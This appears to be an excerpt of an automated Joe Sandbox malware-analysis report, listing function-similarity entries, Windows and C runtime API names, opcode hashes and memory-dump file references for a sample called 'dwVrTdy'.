                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID: ErrorFreeHeapLast
                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                          • API String ID: 485612231-0
                                                                                                                                                                                                                                                                                          • Opcode ID: 74be82d56ef391a05e48391ec7c7a7c4c1a5113b7692c885e2ac2b027a55637c
                                                                                                                                                                                                                                                                                          • Instruction ID: 958ecf318cef03ce475361a78f5a82dea948df6e32d4a702181619dfec7679c3
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 74be82d56ef391a05e48391ec7c7a7c4c1a5113b7692c885e2ac2b027a55637c
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: C0E04651E1D20382FBD8BFB2989747922605F98B80B444430CC0EE72E2EF2CA988A300
                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                          • CloseHandle.KERNEL32(?,?,?,00007FF643F783CD,?,?,00000000,00007FF643F78482), ref: 00007FF643F785BE
                                                                                                                                                                                                                                                                                          • GetLastError.KERNEL32(?,?,?,00007FF643F783CD,?,?,00000000,00007FF643F78482), ref: 00007FF643F785C8
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000009.00000002.2167177998.00007FF643F21000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF643F20000, based on PE: true
                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2167068231.00007FF643F20000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2167241971.00007FF643F90000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2167279178.00007FF643FAD000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2167318398.00007FF643FB1000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_7ff643f20000_dwVrTdy.jbxd
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID: CloseErrorHandleLast
                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                          • API String ID: 918212764-0
                                                                                                                                                                                                                                                                                          • Opcode ID: 205954a0cb9a5bc48dda8edc75c8b963a8c5605bc07cd61d77332ffa7cc79ed3
                                                                                                                                                                                                                                                                                          • Instruction ID: 217cd359de654663f9605acf1cb5c00d0c382a8a12724deba9630fa557a8caf8
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 205954a0cb9a5bc48dda8edc75c8b963a8c5605bc07cd61d77332ffa7cc79ed3
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 36215161F0C68241EAE4B761A5972791681AF847E4F884635DA2EE73D2DF6CE445B300
                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000009.00000002.2167177998.00007FF643F21000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF643F20000, based on PE: true
                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2167068231.00007FF643F20000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2167241971.00007FF643F90000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2167279178.00007FF643FAD000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2167318398.00007FF643FB1000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_7ff643f20000_dwVrTdy.jbxd
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID: _invalid_parameter_noinfo_noreturn
                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                          • API String ID: 3668304517-0
                                                                                                                                                                                                                                                                                          • Opcode ID: 7e4a539f881bd60cbd7d80cf131619e2504d14740298b2d1d92c03c120af3a8f
                                                                                                                                                                                                                                                                                          • Instruction ID: 783c3f73300d4e42489fbe00cfff63c5cdd555a08c3c165499cd777366f7e205
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 7e4a539f881bd60cbd7d80cf131619e2504d14740298b2d1d92c03c120af3a8f
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 87A1AD73B18A4189EB50ABA5C0912AC37B1FB58B68F041632DF6DA7BD4DF38D495D300
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000009.00000002.2167177998.00007FF643F21000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF643F20000, based on PE: true
                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2167068231.00007FF643F20000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2167241971.00007FF643F90000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2167279178.00007FF643FAD000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2167318398.00007FF643FB1000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_7ff643f20000_dwVrTdy.jbxd
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                                                          • Opcode ID: afb93f9686359084c85241550ad29dbe41f7f4196387cce9997bfce311b75db2
                                                                                                                                                                                                                                                                                          • Instruction ID: 85b2dc79084f6c95ee6732a5b29a15729a93b7bcccd9a9e852bc48627c30fd38
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: afb93f9686359084c85241550ad29dbe41f7f4196387cce9997bfce311b75db2
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 73610C62A1CA86C2EAA0BB19D2062FDE3D1FB50BE0F444131EE5DA76D5DF7DF4819600
                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000009.00000002.2167177998.00007FF643F21000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF643F20000, based on PE: true
                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2167068231.00007FF643F20000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2167241971.00007FF643F90000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2167279178.00007FF643FAD000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2167318398.00007FF643FB1000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_7ff643f20000_dwVrTdy.jbxd
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID: _invalid_parameter_noinfo_noreturn
                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                          • API String ID: 3668304517-0
                                                                                                                                                                                                                                                                                          • Opcode ID: 234c8d8404e4ae55aa01bccdf58525c0d7ea71ab3467ba81e049c1528259c199
                                                                                                                                                                                                                                                                                          • Instruction ID: 628dc22cf20ccf711adb4cb0b1e94bc254f66a3b0001b88d7c634f7ef710c936
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 234c8d8404e4ae55aa01bccdf58525c0d7ea71ab3467ba81e049c1528259c199
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 9A61A473B1CB8585EB40EB65E4412ADA760FB84B94F108222DF8DA3BA9DF3CD045D700
                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000009.00000002.2167177998.00007FF643F21000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF643F20000, based on PE: true
                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2167068231.00007FF643F20000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2167241971.00007FF643F90000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2167279178.00007FF643FAD000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2167318398.00007FF643FB1000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_7ff643f20000_dwVrTdy.jbxd
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                          • API String ID: 3215553584-0
                                                                                                                                                                                                                                                                                          • Opcode ID: 80c2eff22136f4c169f0431fb234af93064a5610cb2ce0def08195f1cb992f7f
                                                                                                                                                                                                                                                                                          • Instruction ID: 8d2b3773ede08c4533dd38480b8a9ff15eb14d5d8abb9266b09b8c6113734f87
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 80c2eff22136f4c169f0431fb234af93064a5610cb2ce0def08195f1cb992f7f
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 9041D43291C20147FAB4BB18E54227A73A4EB56B94F541234DA9EE3AD1CF2DE403EB50
                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000009.00000002.2167177998.00007FF643F21000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF643F20000, based on PE: true
                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2167068231.00007FF643F20000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2167241971.00007FF643F90000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2167279178.00007FF643FAD000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2167318398.00007FF643FB1000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_7ff643f20000_dwVrTdy.jbxd
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID: _invalid_parameter_noinfo_noreturn
                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                          • API String ID: 3668304517-0
                                                                                                                                                                                                                                                                                          • Opcode ID: 9cccaee861e2e0c779c18cdcd6089f6ad43d0aa4501e732947362008fa362c1e
                                                                                                                                                                                                                                                                                          • Instruction ID: fff1f794a69892302030e42e12d005ad04661fd47b332f59e3c7c760f0a82a48
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 9cccaee861e2e0c779c18cdcd6089f6ad43d0aa4501e732947362008fa362c1e
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 0831C222A1CB8152EA50FB50E4513AAA361FBD57D0F149231FACD53AEBDF3DD4819B00
                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000009.00000002.2167177998.00007FF643F21000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF643F20000, based on PE: true
                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2167068231.00007FF643F20000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2167241971.00007FF643F90000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2167279178.00007FF643FAD000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2167318398.00007FF643FB1000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_7ff643f20000_dwVrTdy.jbxd
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID: _invalid_parameter_noinfo_noreturn
                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                          • API String ID: 3668304517-0
                                                                                                                                                                                                                                                                                          • Opcode ID: 08403479985c3ed76a3551fa88ffb5f54d57c54fd0b914bd84394c8959b0d9ec
                                                                                                                                                                                                                                                                                          • Instruction ID: d1015977211fb517d3562ad51137dc351395c30095766560ca40035ba60df147
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 08403479985c3ed76a3551fa88ffb5f54d57c54fd0b914bd84394c8959b0d9ec
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: AF315876B09B4982DF55AF69D09126C3361EB48F88B448032DF0D977A9DF3CD891D350
                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                          • _invalid_parameter_noinfo.LIBCMT ref: 00007FF643F868A7
                                                                                                                                                                                                                                                                                            • Part of subcall function 00007FF643F6CD60: IsProcessorFeaturePresent.KERNEL32(?,?,?,?,00007FF643F6CD0F,?,?,?,?,?,00007FF643F6CBFA), ref: 00007FF643F6CD69
                                                                                                                                                                                                                                                                                            • Part of subcall function 00007FF643F6CD60: GetCurrentProcess.KERNEL32(?,?,?,?,00007FF643F6CD0F,?,?,?,?,?,00007FF643F6CBFA), ref: 00007FF643F6CD8E
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000009.00000002.2167177998.00007FF643F21000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF643F20000, based on PE: true
                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2167068231.00007FF643F20000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2167241971.00007FF643F90000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2167279178.00007FF643FAD000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2167318398.00007FF643FB1000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_7ff643f20000_dwVrTdy.jbxd
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID: CurrentFeaturePresentProcessProcessor_invalid_parameter_noinfo
                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                          • API String ID: 4036615347-0
                                                                                                                                                                                                                                                                                          • Opcode ID: 3d98c4b73ae2db0dcd3f5b2116bc649f4b6edea03ee29548f9e79326a9e3dd55
                                                                                                                                                                                                                                                                                          • Instruction ID: dffb41e401f7832d2277932a6ac14cf99471f02ad2793337ff27bf4c0d2d45bf
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 3d98c4b73ae2db0dcd3f5b2116bc649f4b6edea03ee29548f9e79326a9e3dd55
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 3F21B421B0D71242FBEDBA665202239A690AF44BE0F144D30DF5CA7BC5DF3DE8166301
                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000009.00000002.2167177998.00007FF643F21000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF643F20000, based on PE: true
                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2167068231.00007FF643F20000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2167241971.00007FF643F90000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2167279178.00007FF643FAD000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2167318398.00007FF643FB1000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_7ff643f20000_dwVrTdy.jbxd
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                          • API String ID: 3215553584-0
                                                                                                                                                                                                                                                                                          • Opcode ID: 5e62b5da85285c3ea154d9c64e7bec3a32060aad3f6a6f68b67314db75222940
                                                                                                                                                                                                                                                                                          • Instruction ID: 21f7233c8e305399e4e607a61a263c89ca583e0837c1d81a336c48cd00aac7e8
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 5e62b5da85285c3ea154d9c64e7bec3a32060aad3f6a6f68b67314db75222940
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 0B31D332A2C60282F7E1BF1588473BC2A60AF55B90F550235EA3DA33D2DF7CE845A710
                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000009.00000002.2167177998.00007FF643F21000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF643F20000, based on PE: true
                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2167068231.00007FF643F20000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2167241971.00007FF643F90000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2167279178.00007FF643FAD000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2167318398.00007FF643FB1000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_7ff643f20000_dwVrTdy.jbxd
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID: _invalid_parameter_noinfo_noreturn
                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                          • API String ID: 3668304517-0
                                                                                                                                                                                                                                                                                          • Opcode ID: 46713c96f3fb3f4d89f52796d8da4db44da4b70b41aedb2393583da456be5a29
                                                                                                                                                                                                                                                                                          • Instruction ID: 9f11380bf02a5102d4768c65c3ac5f041d936d4aa7952095a1687a66890720ff
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 46713c96f3fb3f4d89f52796d8da4db44da4b70b41aedb2393583da456be5a29
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: E51151A2A1868691EB44FB25D1563BD2351EB11FC8F804031DA5D5BADBDF6ED8C4D380
                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                            • Part of subcall function 00007FF643F3F4E0: _invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF643F3F5E2
                                                                                                                                                                                                                                                                                            • Part of subcall function 00007FF643F3F4E0: Concurrency::cancel_current_task.LIBCPMT ref: 00007FF643F3F5E8
                                                                                                                                                                                                                                                                                            • Part of subcall function 00007FF643F691B0: _invalid_parameter_noinfo.LIBCMT ref: 00007FF643F691DB
                                                                                                                                                                                                                                                                                          • std::_Throw_Cpp_error.LIBCPMT ref: 00007FF643F48957
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000009.00000002.2167177998.00007FF643F21000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF643F20000, based on PE: true
                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2167068231.00007FF643F20000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2167241971.00007FF643F90000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2167279178.00007FF643FAD000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2167318398.00007FF643FB1000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_7ff643f20000_dwVrTdy.jbxd
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID: Concurrency::cancel_current_taskCpp_errorThrow__invalid_parameter_noinfo_invalid_parameter_noinfo_noreturnstd::_
                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                          • API String ID: 88918588-0
                                                                                                                                                                                                                                                                                          • Opcode ID: cda83e72df4b4452b10499556b15efd889cd94d2f8c263e70bb30bbf8a668c49
                                                                                                                                                                                                                                                                                          • Instruction ID: 263f0ffa3f3747da899071cbf8528263f5b988f2de036dd5bbf38c62f447013d
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: cda83e72df4b4452b10499556b15efd889cd94d2f8c263e70bb30bbf8a668c49
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 77218E3260CB8081E7A0FF12E4526AA73A0FB88BD0F459031EE8D97B99DE3CD041C700
                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000009.00000002.2167177998.00007FF643F21000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF643F20000, based on PE: true
                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2167068231.00007FF643F20000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2167241971.00007FF643F90000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2167279178.00007FF643FAD000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2167318398.00007FF643FB1000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_7ff643f20000_dwVrTdy.jbxd
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID: HandleModule$AddressFreeLibraryProc
                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                          • API String ID: 3947729631-0
                                                                                                                                                                                                                                                                                          • Opcode ID: 12c8ddd49b29eafe03094771190050c500c37e2408f84eeddbfe35924bea53d0
                                                                                                                                                                                                                                                                                          • Instruction ID: 9fc1222cdf16e04306179ad0e3da307c15239f3d476289ca5047ee6733da811a
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 12c8ddd49b29eafe03094771190050c500c37e2408f84eeddbfe35924bea53d0
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 42218332A18B0989EBA4BF64C4812EC33B0EB4471CF441639D71D97AC5DF39D886D740
                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000009.00000002.2167177998.00007FF643F21000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF643F20000, based on PE: true
                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2167068231.00007FF643F20000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2167241971.00007FF643F90000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2167279178.00007FF643FAD000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2167318398.00007FF643FB1000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_7ff643f20000_dwVrTdy.jbxd
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                          • API String ID: 3215553584-0
                                                                                                                                                                                                                                                                                          • Opcode ID: 17c84bb8df17f7340c3a78faa9adff03cae7faf370082ad63592511e71fde380
                                                                                                                                                                                                                                                                                          • Instruction ID: d006ac66dcf79cc8f45f5bd95bb86213b6e32ab1669c34910b3b7b5326d21203
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 17c84bb8df17f7340c3a78faa9adff03cae7faf370082ad63592511e71fde380
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: FC218472A0C68287DBA1BF18D48137976B0FB84B94F684235EA5DD76DADF3DD4049B00
                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000009.00000002.2167177998.00007FF643F21000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF643F20000, based on PE: true
                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2167068231.00007FF643F20000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2167241971.00007FF643F90000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2167279178.00007FF643FAD000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2167318398.00007FF643FB1000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_7ff643f20000_dwVrTdy.jbxd
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                          • API String ID: 3215553584-0
                                                                                                                                                                                                                                                                                          • Opcode ID: 3f3ede2bc854db419c29ee7d11418b5426f282dde39881f24eb10840af044c49
                                                                                                                                                                                                                                                                                          • Instruction ID: 861d65689c6a1f9c0de684bf615f2b613c83a859eaf937bd128f17c62d12dc66
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 3f3ede2bc854db419c29ee7d11418b5426f282dde39881f24eb10840af044c49
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 3321A43261C68287EBA1BF1CD44237976A0FB84B94F684235EA5DD76DADF3CD5009B00
                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000009.00000002.2167177998.00007FF643F21000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF643F20000, based on PE: true
                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2167068231.00007FF643F20000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2167241971.00007FF643F90000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2167279178.00007FF643FAD000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2167318398.00007FF643FB1000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_7ff643f20000_dwVrTdy.jbxd
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID: _invalid_parameter_noinfo_noreturn
                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                          • API String ID: 3668304517-0
                                                                                                                                                                                                                                                                                          • Opcode ID: 9fa15735631767cc7a8a2c7e5030338c03b017a03d34edb59f1dd26dc0a53627
                                                                                                                                                                                                                                                                                          • Instruction ID: 9cc26069e3c462cc60bc4b1c1de3cbb340e74043ceddc3338051bdcaa39c693a
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 9fa15735631767cc7a8a2c7e5030338c03b017a03d34edb59f1dd26dc0a53627
